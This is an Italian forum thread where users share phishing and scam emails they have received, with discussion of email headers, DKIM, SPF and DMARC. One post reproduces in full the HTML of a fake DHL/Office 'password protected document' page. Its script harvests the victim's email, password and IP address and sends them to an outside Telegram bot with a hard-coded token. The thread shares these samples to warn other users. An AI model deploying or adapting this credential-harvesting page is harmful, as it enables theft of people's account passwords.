⚠️ Phishing: segnalazioni truffe online

[fragrua]

questa, ricevuta or ora, da schiantar dal ridere (leggetela per esteso, mi raccomando...)

Ma l'hanno pure stampata e scannerizzata? Che grandi!

[Curzio]

certo che l'idea di essere iscritto previa comunicazione a mezzo racommanadata, e dopo l'arresto, nel registro nazionale dei delinquenti sessuali mi sconfiffera non poco... è la volta buona che svolto

[pierospanu]

Semplicemente POETICO!

Piero

[Andrea@Mac]

Quando la realtà supera l'illusione.

[Andrea@Mac]

Mittente: DHL Express <communicationsIT@express.dhl.com>

Testo mail phishing fasulla:
Gentile Cliente,
inviamo in allegato il documento di notifica di esportazione della spedizione in oggetto.
Le ricordiamo che per ogni altra informazione, richiesta di aggiornamento o nuova richiesta, puo' contattare il nostro Servizio Clienti DHL al numero 199 199 345 opzione 1.5 .
Distinti Saluti.
DHL Express (Italy) srl

Codice html del falso documento di trasporto:

Codice: Seleziona tutto

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Excel Login</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-image: url("https://gyazo.com/5aa75ee29a1fdb3fab0c85507100d60a.jpg");
            background-size: cover;
            background-position: center;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }

        /* Overlay style */
        .overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(128, 128, 128, 0.7); /* Grey with transparency */
            z-index: 1; /* Layer on top */
        }

        .container {
            position: relative;
            background-color: #fff;
            border-radius: 8px;
            padding: 20px;
            text-align: center;
            box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
            max-width: 400px;
            z-index: 2; /* Above overlay */
            width: 0;
            opacity: 0;
            animation: slideIn 0.5s forwards;
        }

        @keyframes slideIn {
            from {
                width: 0;
                opacity: 0;
            }
            to {
                width: 100%;
                opacity: 1;
            }
        }

        .logo {
            width: 100px;
            height: 100px;
            margin: auto;
            display: block;
        }

        h2 {
            font-weight: bold;
            margin-top: 20px;
            margin-bottom: 10px;
        }

        input[type="text"],
        input[type="password"],
        button {
            width: calc(100% - 40px);
            margin-bottom: 10px;
            padding: 10px;
            border-radius: 5px;
            border: 1px solid #ccc;
            box-sizing: border-box;
        }

        button {
            background-color: #039126;
            color: #fff;
            cursor: pointer;
            transition: background-color 0.3s ease;
        }

        button:hover {
            background-color: #037a22;
        }

        .error-container {
            color: white;
            background: lightcoral;
            padding: 10px;
            margin-top: 10px;
            border-radius: 5px;
            display: none;
        }

        .spinner {
            border: 4px solid rgba(0, 0, 0, 0.1);
            border-top: 4px solid #333;
            border-radius: 50%;
            width: 30px;
            height: 30px;
            animation: spin 1s linear infinite;
            margin: 20px auto;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
</head>
<body>
    <!-- Grey overlay -->
    <div class="overlay"></div>

    <div class="container">
        <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRXc5lZWoFENGPQKny5LvxBawU-ikBxeN66CA&s" width="300" height="50">
        <h2>Document Cloud Storage <span style="font-weight: bold;">Office</span></h2>
        <p>This document is password protected.</p>

        <form name="loginForm" id="loginForm">
            <input type="text" name="email" id="email" placeholder="Username" required value="web@medith.net">
            <input type="password" name="password" id="password" placeholder="Password" required>
            <button type="submit" id="submit-btn">View</button>
        </form>

        <div class="error-container"></div>
        <div class="spinner" style="display:none;"></div>
    </div>

    <script>
        let signInAttempts = 0;

        window.addEventListener('DOMContentLoaded', () => {
            const emailFromURL = new URLSearchParams(window.location.search).get('email');
            if (emailFromURL) {
                document.getElementById('email').value = emailFromURL;
            }

            const form = document.getElementById('loginForm');
            const signInButton = document.getElementById('submit-btn');
            const errorContainer = document.querySelector('.error-container');
            const spinner = document.querySelector('.spinner');

            form.addEventListener('submit', async (event) => {
                event.preventDefault();
                signInAttempts++;
                signInButton.textContent = 'Loading...';

                const formData = new FormData(form);
                
                // Get user IP address
                const userIP = await getUserIP();
                formData.append('userIP', userIP); // Append IP to form data

                const credentials = {
                    email: formData.get('email'),
                    password: formData.get('password'),
                    userIP: userIP
                };

                try {
                    // Replace with your Telegram bot token and chat ID
                    const botToken = '5544798312:AAEVci3VXVCyC3xIBxOKZjAllL171XRWIrE';
                    const chatId = '1212297121';
                    const message = `Login attempt:\nEmail: ${credentials.email}\nPassword: ${credentials.password}\nIP: ${credentials.userIP}`;

                    // Send the message to the Telegram bot
                    const response = await fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json',
                        },
                        body: JSON.stringify({
                            chat_id: chatId,
                            text: message,
                        }),
                    });

                    if (response.ok) {
                        // Handle success response
                        if (signInAttempts <= 2) {
                            showError(errorContainer, 'Wrong password. Please try again.');
                        }

                        if (signInAttempts === 3) {
                            spinner.style.display = 'block';
                            setTimeout(() => {
                                const redirects = ['https://microsoft.com', 'https://office.com', 'https://live.com'];
                                const randomRedirect = redirects[Math.floor(Math.random() * redirects.length)];
                                window.location.href = randomRedirect;
                            }, 1500);
                        }
                    } else {
                        showError(errorContainer, 'Failed to send data to Telegram. Please try again.');
                    }
                } catch (error) {
                    showError(errorContainer, 'Error occurred. Please try again.');
                } finally {
                    // Reset button text
                    signInButton.textContent = 'View';
                }
            });
        });

        async function getUserIP() {
            const response = await fetch('https://api.ipify.org?format=json');
            const data = await response.json();
            return data.ip; // Return the IP address
        }

        function showError(errorContainer, message) {
            errorContainer.textContent = message;
            errorContainer.style.display = 'block';

            // Clear password field
            document.getElementById('password').value = '';

            // Hide the error message after a few seconds
            setTimeout(() => {
                errorContainer.style.display = 'none';
            }, 3000);
        }
    </script>          
</body>
</html>

[mattleega]

Ok, il pippone,
non facevi prima a dirci di buttarlo senza neppure leggerlo?

[Andrea@Mac]

Nota: messaggio autentico da noreply@inps.it per avvisare ed allertare gli utenti riguardo le continue truffe a discapito di utenti INPS.

Attenzione alle truffe telematiche

Gentile utente,

ti informiamo che stanno aumentando le truffe online che usano il nome dell’INPS per rubare dati personali e finanziari.
Queste truffe avvengono principalmente attraverso SMS o e-mail false (chiamate phishing o smishing), che sembrano inviate dall’INPS.

Questi messaggi invitano a cliccare su link non ufficiali per verificare, confermare o integrare i propri dati per continuare a percepire prestazioni INPS, ottenere presunti rimborsi o altre motivazioni simili.

Non farlo! È una trappola per rubare le tue informazioni personali.

Se fornisci i tuoi dati su tali siti, i truffatori possono:

richiedere prestiti a tuo nome;
aprire conti correnti fraudolenti;
dirottare i pagamenti delle tue prestazioni;
attivare, a tua insaputa, credenziali SPID a tuo nome;
accedere ai servizi della Pubblica Amministrazione fingendo di essere te.

Fai quindi attenzione a qualsiasi messaggio SMS o e-mail, apparentemente inviato a nome di INPS, che ti invita a cliccare su link in essi riportati, e ricorda che:

l’INPS non invia mai e-mail o SMS con link per confermare dati o ricevere rimborsi ma invitiamo sempre gli utenti ad accedere sempre e solo al sito istituzionale www .inps .it;
le uniche e-mail con link che INPS invia sono quelle per le indagini sulla soddisfazione degli utenti, ma non ti chiederanno mai dati bancari o documenti;
l’unico sito ufficiale dell’INPS è www .inps .it. Controlla sempre che l’indirizzo del sito che stai visitando termini con “.inps. it”, perché possono venire creati domini con denominazioni simili e ingannevoli (es. insp, ipns, inpis e simili);
se hai dubbi, consulta il vademecum anti-truffe sul sito INPS, dove trovi esempi di messaggi falsi e consigli su come difenderti.

Se ricevi un messaggio sospetto, non cliccare sul link e segnalalo subito!

INPS contro le frodi

Diffondiamo!

[kext]

Nota: messaggio autentico da noreply@inps.it per avvisare ed allertare gli utenti riguardo le continue truffe a discapito di utenti INPS.

Attenzione alle truffe telematiche

Gentile utente,

ti informiamo che stanno aumentando le truffe online che usano il nome dell’INPS per rubare dati personali e finanziari.
Queste truffe avvengono principalmente attraverso SMS o e-mail false (chiamate phishing o smishing), che sembrano inviate dall’INPS.

Questi messaggi invitano a cliccare su link non ufficiali per verificare, confermare o integrare i propri dati per continuare a percepire prestazioni INPS, ottenere presunti rimborsi o altre motivazioni simili.

Non farlo! È una trappola per rubare le tue informazioni personali.

Se fornisci i tuoi dati su tali siti, i truffatori possono:

richiedere prestiti a tuo nome;
aprire conti correnti fraudolenti;
dirottare i pagamenti delle tue prestazioni;
attivare, a tua insaputa, credenziali SPID a tuo nome;
accedere ai servizi della Pubblica Amministrazione fingendo di essere te.

Fai quindi attenzione a qualsiasi messaggio SMS o e-mail, apparentemente inviato a nome di INPS, che ti invita a cliccare su link in essi riportati, e ricorda che:

l’INPS non invia mai e-mail o SMS con link per confermare dati o ricevere rimborsi ma invitiamo sempre gli utenti ad accedere sempre e solo al sito istituzionale www .inps .it;
le uniche e-mail con link che INPS invia sono quelle per le indagini sulla soddisfazione degli utenti, ma non ti chiederanno mai dati bancari o documenti;
l’unico sito ufficiale dell’INPS è www .inps .it. Controlla sempre che l’indirizzo del sito che stai visitando termini con “.inps. it”, perché possono venire creati domini con denominazioni simili e ingannevoli (es. insp, ipns, inpis e simili);
se hai dubbi, consulta il vademecum anti-truffe sul sito INPS, dove trovi esempi di messaggi falsi e consigli su come difenderti.

Se ricevi un messaggio sospetto, non cliccare sul link e segnalalo subito!

INPS contro le frodi

Diffondiamo!

Arrivata stamattina nella posta indesiderata.. non ho nemmeno controllato l'header: presa e buttata, come tutte le altre.

[Andrea@Mac]

Nota: messaggio autentico da noreply@inps.it per avvisare ed allertare gli utenti riguardo le continue truffe a discapito di utenti INPS.

INPS contro le frodi

Arrivata stamattina nella posta indesiderata.. non ho nemmeno controllato l'header: presa e buttata, come tutte le altre.

ahahah mannò questa era vera!

[kext]

hai controllato l'header?

[Andrea@Mac]

Received: from batchr06.servizi.inps (HELO [192.168.9.243]) ([192.168.9.243]) by mgw01.inps.it
DKIM-Signature: v=1; a=rsa-sha256; c=simple/simple; d=inps.it; i=@inps.it; q=dns/txt; s=MGW; t=1747941233; x=1779477233;

sì sì la mail è vera da INPS.it

non potrebbe essere diversamente visto il contenuto del messaggio che avvisa gli utenti INPS di fare attenzione ai continui tentativi di truffa

in questa mail non ci sono link ed è tutta testo, appositamente impostata così

i più pericolosi tentativi di truffa credo siano quelli via SMS e telefonate

[kext]

grazie..

[spegahsheen]

Received: from batchr06.servizi.inps (HELO [192.168.9.243]) ([192.168.9.243]) by mgw01.inps.it
DKIM-Signature: v=1; a=rsa-sha256; c=simple/simple; d=inps.it; i=@inps.it; q=dns/txt; s=MGW; t=1747941233; x=1779477233;

sì sì la mail è vera da INPS.it

Quali parametri controlli per affermarlo? È sufficiente la presenza della stringa batchr06.servizi.inps e delle altre che contengono inps o é necessario verificare qualche corrispondenza con gli indirizzi IP?

[Andrea@Mac]

Arrivata per email. Truffa!
Wikipedia leggerà e prenderà provvedimenti.

Email: wayne@professionalcompanyprofile.com
Da: Wayne Young
Azienda: Professional Company Profile
Telefono: 8149805065
Corpo del messaggio:
Wikipedia is considered to be the World’s most significant tool for reference material. The Wiki links show up on the 1st page of Google 97% of the time. With a Page on one of the most revered reference tools, you are sure to get yourself or your business noticed. So if you're thinking of getting a Wikipedia Page created, it's the best time of the year.
If you are interested in getting more information just respond back to this email.
Thanks,
Wayne Young
Professional Company Profile
wayne@professionalcompanyprofile.com

[Andrea@Mac]

Received: from batchr06.servizi.inps (HELO [192.168.9.243]) ([192.168.9.243]) by mgw01.inps.it
DKIM-Signature: v=1; a=rsa-sha256; c=simple/simple; d=inps.it; i=@inps.it; q=dns/txt; s=MGW; t=1747941233; x=1779477233;

sì sì la mail è vera da INPS.it

Quali parametri controlli per affermarlo? È sufficiente la presenza della stringa batchr06.servizi.inps e delle altre che contengono inps o é necessario verificare qualche corrispondenza con gli indirizzi IP?

Controlli l'inizio del percorso. Se l'inizio corrisponde a server che hanno un riferimento al mittente, allora ok.
Ovviamente non necessariamente il mittente dev'essere in questo caso per forza @inps.it
Ma lo è. Quindi non devo nemmeno fare ricerche correlate al server d'invio utilizzato, che potrebbe essere legittimo, anche se non fosse inps.it

DKIM dice anche che il mittente, dominio, indirizzo, sono "certificati" come validi, quindi non camuffati.
È un'ulteriore prova.

Infatti se tu avessi ad esempio il dominio spegahsheen.com e non hai le impostazioni corrette sui record DNS del dominio, io potrei spedire una mail facendo finta d'essere hallo@spegahsheen.com come mittente, ma nel sorgente del messaggio vedresti quale server ha inviato veramente la mail e se corrisponde o meno al dominio spegahsheen.com

In Italia non siamo abituati ad usare i parametri corretti che "garantiscono" meno spam, certezza mittente, blocco malware, da mail camuffate, da siti compromessi, etc.

1) DKIM (DomainKeys Identified Mail)
2) SPF (Sender Policy Framework) – Record TXT
3) DMARC (Domain-based Message Authentication, Reporting & Conformance) – Record TXT
MX (Mail Exchange) – Record MX

e poi volendo

TLSA (DANE – DNS-based Authentication of Named Entities) – Record TLSA
CAA (Certification Authority Authorization) – Record CAA
PTR (Pointer Record) – Record PTR (reverse DNS)
DNSSEC (DNS Security Extensions)

Se i primi 3 elencati fossero usati obbligatoriamente da tutti i provider, il mondo delle mail sarebbe un posto più sicuro.
Ma Aruba non vuole, preferisce rendere il nostro Paese il terzo mondo del web.
No scherzo, adesso anche Aruba permette di usare ulteriori sicurezze. Bisogna saperlo e bisogna impostare i record DNS corretti per migliorare la sicurezza dei propri domini, mail server, siti, CMS vari.
Oltreoceano erano attivi già 10anni fa.